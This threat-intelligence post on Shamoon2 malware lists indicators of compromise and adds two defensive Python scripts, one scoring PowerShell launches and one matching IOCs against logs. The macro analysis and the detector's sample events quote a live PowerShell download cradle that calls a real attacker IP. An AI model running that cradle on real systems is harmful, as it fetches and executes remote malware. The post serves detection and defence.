Additional Insights on Shamoon2
IBM analysts recently unveiled a first look at how threat actors may have placed Shamoon2 malware on systems in Saudi Arabia. Researchers showcased a potential malware lifecycle which started with spear phishing and eventually led to the deployment of the disk-wiping malware known as Shamoon. Their research showcased a set of downloaders and domains that could potentially lead to a more extensive malware distribution campaign.
While researching elements in the IBM report, ASERT discovered additional malicious domains, IP addresses, and artifacts. The basic functionality of the new documents and their PowerShell components matched what was previously disclosed. For more information on the overall capabilities of the malware, please review IBM's ongoing research. It is our hope that by providing additional indicators, end-point investigators and network defenders will be able to discover and mitigate more Shamoon2 related compromises.
Initial Discoveries
The following new samples were likely delivered via similar spear phishing campaigns as described in IBM's research. All three shared the same IPs and URLs, also provided below. These samples were located by pivoting on document attributes. In this case, a sample from the IBM report indicated the document author ‘gerry.knight’ which led us to the following three additional samples.
MD5
- 2a0df97277ddb361cecf8726df6d78ac
- 5e5ea1a67c2538dbc01df28e4ea87472
- d30b8468d16b631cafe458fd94cc3196
IPs
- 104.218.120[.]128
- 69.87.223[.]26
- 5.254.100[.]200
URLs
- analytics-google[.]org:69/checkFile.aspx
- analytics-google[.]org
- 69.87.223[.]26:8080/p
The following is a screenshot of a macro-enabled document captured from sample 5e5ea1a67c2538dbc01df28e4ea87472:
Once enabled, the extracted macro executed the following:
powershell.exe -w hidden -noni -nop -c "iex(New-Object System.Net.WebClient).DownloadString('http://69.87.223.26:8080/p')"
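The command line above is a textbook PowerShell download cradle: a hidden window, no interactive session, no profile, and an Invoke-Expression over a string fetched with WebClient.DownloadString, all spawned from an Office process. The following is an added example (not code from the ASERT post) of how a defender might score process-creation events for that combination. The event layout ("key=value | key=value") and the sample events are constructed for the example; the first event mirrors the macro-launched command line described above, the second is benign, and the third is an encoded-command variant with the long-form switch names.

```python
import re

# Constructed sample process-creation events (not real Sysmon/EDR output).
# Layout is a simple "key=value | key=value" line chosen for this example.
SAMPLE_EVENTS = [
    r"ParentImage=C:\Program Files\Microsoft Office\WINWORD.EXE | "
    r"CommandLine=powershell.exe -w hidden -noni -nop -c "
    "\"iex(New-Object System.Net.WebClient).DownloadString('http://69.87.223.26:8080/p')\"",
    r"ParentImage=C:\Windows\explorer.exe | "
    r"CommandLine=powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1",
    r"ParentImage=C:\Program Files\Microsoft Office\EXCEL.EXE | "
    r"CommandLine=powershell.exe -WindowStyle Hidden -NonInteractive -NoProfile -EncodedCommand SQBFAFgA",
]

# Office applications whose children launching PowerShell deserve extra weight.
OFFICE_PARENTS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")

# PowerShell accepts any unambiguous prefix of a parameter name (-w, -win,
# -WindowStyle all select the same switch), so the patterns use "\w*" after the
# shortest common prefix rather than spelling out every abbreviation.
INDICATORS = [
    ("hidden_window", re.compile(r"-w\w*\s+hidden", re.I), 1),
    ("non_interactive", re.compile(r"-noni\w*", re.I), 1),
    ("no_profile", re.compile(r"-nop\w*", re.I), 1),
    ("inline_eval", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 2),
    ("net_fetch", re.compile(r"(?:net\.webclient|downloadstring|downloadfile|downloaddata|invoke-webrequest|\biwr\b)", re.I), 2),
    ("encoded_command", re.compile(r"-e(?:c|nc\w*)?\s+[A-Za-z0-9+/=]{8,}", re.I), 2),
]
OFFICE_PARENT_WEIGHT = 3
ALERT_THRESHOLD = 5  # chosen for this example; tune against your own baseline


def parse_event(line):
    """Split a constructed 'key=value | key=value' event line into a dict."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def assess(line):
    """Score one event; returns the matched indicator names and a verdict."""
    event = parse_event(line)
    cmd = event.get("CommandLine", "")
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    hits = [name for name, rx, _ in INDICATORS if rx.search(cmd)]
    score = sum(weight for name, _, weight in INDICATORS if name in hits)
    if parent in OFFICE_PARENTS:
        hits.append("office_parent")
        score += OFFICE_PARENT_WEIGHT
    return {"score": score, "hits": hits, "suspicious": score >= ALERT_THRESHOLD}


def scan(lines):
    """Assess every event line and return the results in input order."""
    return [assess(line) for line in lines]


if __name__ == "__main__":
    for line, result in zip(SAMPLE_EVENTS, scan(SAMPLE_EVENTS)):
        flag = "ALERT" if result["suspicious"] else "ok   "
        print(f"{flag} score={result['score']:2d} hits={result['hits']}")
```

The weights are deliberately small for the individual switches, since -nop or -w hidden alone show up in plenty of legitimate automation; it is the co-occurrence with an in-memory fetch-and-evaluate (or an encoded command) under an Office parent that pushes the score over the threshold.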
Pivoting on Passive DNS
From the previous samples, we performed a passive DNS lookup on the IPs. We found get.adobe.go-microstf[.]com hosted at 104.218.120[.]128 around the time this campaign was ongoing, November 2016.
Researching the domain go-microstf[.]com, hosted at 45.63.10[.]99, revealed yet another iteration of malicious executables. In this case, a URL used to download the PowerShell component shared a naming convention found in the IBM report, http://69.87.223[.]26:8080/eiloShaegae1 and connected to the IP address used by the previous three samples. The following are IOCs related to this domain:
MD5
- 83be35956e5d409306a81e88a1dc89fd
IPs
- 45.63.10[.]99
- 69.87.223[.]26
URLs
- go-microstf[.]com
- 69.87.223[.]26:8080/eiloShaegae1
- go-microstf[.]com/checkfile.aspx
The domain go-microstf[.]com was originally set up to spoof the Google Analytics login page. The following screenshot is from the malicious domain:
Possible Connections to Iranian state-sponsored Kittens
Finally, research yielded a relatively unique sample. This particular iteration was submitted to VirusTotal on September 16, 2016. The majority of samples analyzed to date were submitted no earlier than mid-October, with most being submitted in January 2017 or later. We were able to discover this particular version by diving further into connections to analytics-google[.]org. Unlike newer samples, this one created a unique file 'sloo.exe'. The file was created at C:\Documents and Settings\Admin\Local Settings\Temp\sloo.exe. In addition to this file, the sample also contacted 104.238.184[.]252 for the PowerShell executable.
Researchers at Palo Alto have attributed sloo.exe and related activities to threat actors of a likely Iranian state-sponsored origin which they’ve named Magic Hound. The group Magic Hound is linked via infrastructure and tools to the Rocket Kitten threat actor group although Palo Alto cannot confirm the extent of any relationship between the two groups.
Dell SecureWorks analysts recently concluded that domains discussed in the IBM report were linked to the Iranian PuppyRAT. In addition, Dell analysts have assessed with high confidence that these activities are attributable to Iranian state-sponsored actors.
IOCs for this version were:
MD5
- 07d6406036d6e06dc8019e3ade6ee7de
IPs
- 104.238.184[.]252
- 5.254.100[.]200
URLs
- analytics-google[.]org:69/checkFile.aspx
Conclusion
These additional IOCs will hopefully provide more context into the ongoing threat. The link to possible Iranian threat actors supports ongoing analysis that Shamoon2 was perpetrated by Iranian state-sponsored threat actors. The last sample discussed may be malware-0 or at least part of the overall development and subsequent deployment of tools used to install Shamoon on Saudi systems.
Consolidated IOC list:
MD5
- 2a0df97277ddb361cecf8726df6d78ac
- 5e5ea1a67c2538dbc01df28e4ea87472
- d30b8468d16b631cafe458fd94cc3196
- 83be35956e5d409306a81e88a1dc89fd
- 07d6406036d6e06dc8019e3ade6ee7de
IPs
- 104.218.120[.]128
- 69.87.223[.]26
- 5.254.100[.]200
- 45.63.10[.]99
- 104.238.184[.]252
URLs
- analytics-google[.]org:69/checkFile.aspx
- analytics-google[.]org
- 69.87.223[.]26:8080/p
- go-microstf[.]com
- 69.87.223[.]26:8080/eiloShaegae1
- get.adobe.go-microstf[.]com
- go-microstf[.]com/checkfile.aspx
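To put the consolidated list to use, a defender needs to refang the indicators, sort them by type, and match them against what the network and endpoints actually saw. The following is an added example (not code from the ASERT post) that indexes the list above exactly as published, then runs it over a handful of constructed proxy log lines and a constructed endpoint hash inventory. The proxy log format ("timestamp src=... method=... url=...") and the sample lines are assumptions for the example; URL paths are compared case-insensitively because the post lists both checkFile.aspx and checkfile.aspx and IIS treats the two as the same resource.

```python
import re
from urllib.parse import urlsplit

# The post's consolidated IOC list, copied verbatim in its defanged form.
RAW_IOCS = [
    "2a0df97277ddb361cecf8726df6d78ac", "5e5ea1a67c2538dbc01df28e4ea87472",
    "d30b8468d16b631cafe458fd94cc3196", "83be35956e5d409306a81e88a1dc89fd",
    "07d6406036d6e06dc8019e3ade6ee7de",
    "104.218.120[.]128", "69.87.223[.]26", "5.254.100[.]200",
    "45.63.10[.]99", "104.238.184[.]252",
    "analytics-google[.]org:69/checkFile.aspx", "analytics-google[.]org",
    "69.87.223[.]26:8080/p", "go-microstf[.]com",
    "69.87.223[.]26:8080/eiloShaegae1", "get.adobe.go-microstf[.]com",
    "go-microstf[.]com/checkfile.aspx",
]

# Constructed proxy log lines (not from the post) used to exercise the matcher.
SAMPLE_PROXY_LOG = [
    "2016-11-14T10:02:11Z src=10.0.0.5 method=GET url=http://analytics-google.org:69/checkFile.aspx",
    "2016-11-14T10:02:12Z src=10.0.0.5 method=GET url=http://69.87.223.26:8080/p",
    "2016-11-14T10:05:40Z src=10.0.0.9 method=GET url=https://www.google.com/analytics/",
    "2016-11-15T08:21:03Z src=10.0.0.7 method=GET url=http://get.adobe.go-microstf.com/update",
    "2016-11-15T08:25:00Z src=10.0.0.7 method=GET url=http://45.63.10.99/",
]
# Constructed endpoint hash inventory (not from the post); case varies on purpose.
SAMPLE_HASHES = ["D30B8468D16B631CAFE458FD94CC3196", "d41d8cd98f00b204e9800998ecf8427e"]

MD5_RX = re.compile(r"^[0-9a-f]{32}$", re.I)
IPV4_RX = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")


def refang(ioc):
    """Undo the [.] and hxxp defanging used in published reports."""
    return ioc.strip().replace("[.]", ".").replace("hxxp", "http")


def build_index(raw_iocs):
    """Sort refanged IOCs into md5 / ip / domain / url sets for fast lookup."""
    idx = {"md5": set(), "ip": set(), "domain": set(), "url": set()}
    for raw in raw_iocs:
        ioc = refang(raw)
        if MD5_RX.match(ioc):
            idx["md5"].add(ioc.lower())
            continue
        host_port, slash, path = ioc.partition("/")
        host, _, port = host_port.partition(":")
        host = host.lower()
        if slash or port:
            # URL entries are keyed (host, port, path); default port 80 (http).
            idx["url"].add((host, port or "80", "/" + path.lower()))
        elif IPV4_RX.match(host):
            idx["ip"].add(host)
        else:
            idx["domain"].add(host)
    return idx


def match_url(idx, url):
    """Return sorted (kind, ioc) hits for one URL against the index."""
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    port = str(parts.port or (443 if parts.scheme == "https" else 80))
    path = (parts.path or "/").lower()
    hits = []
    if (host, port, path) in idx["url"]:
        hits.append(("url", f"{host}:{port}{path}"))
    if host in idx["ip"]:
        hits.append(("ip", host))
    for dom in idx["domain"]:
        # A listed domain also covers its subdomains.
        if host == dom or host.endswith("." + dom):
            hits.append(("domain", dom))
    return sorted(hits)


def scan_proxy_log(idx, lines):
    """Return (timestamp, hits) for every log line whose URL matched an IOC."""
    alerts = []
    for line in lines:
        m = re.search(r"\burl=(\S+)", line)
        if not m:
            continue
        hits = match_url(idx, m.group(1))
        if hits:
            alerts.append((line.split()[0], hits))
    return alerts


def match_hashes(idx, observed):
    """Return the observed MD5s (lower-cased) that appear in the index."""
    return sorted(h.lower() for h in observed if h.lower() in idx["md5"])


if __name__ == "__main__":
    index = build_index(RAW_IOCS)
    for ts, hits in scan_proxy_log(index, SAMPLE_PROXY_LOG):
        print(ts, hits)
    print("hash hits:", match_hashes(index, SAMPLE_HASHES))
```

Bare IP and domain entries are matched on the host alone, while URL entries require host, port and path to agree, so a hit on 69.87.223[.]26:8080/p reports both the URL and the underlying IP; the second is the one to pivot on if the path changes between campaigns.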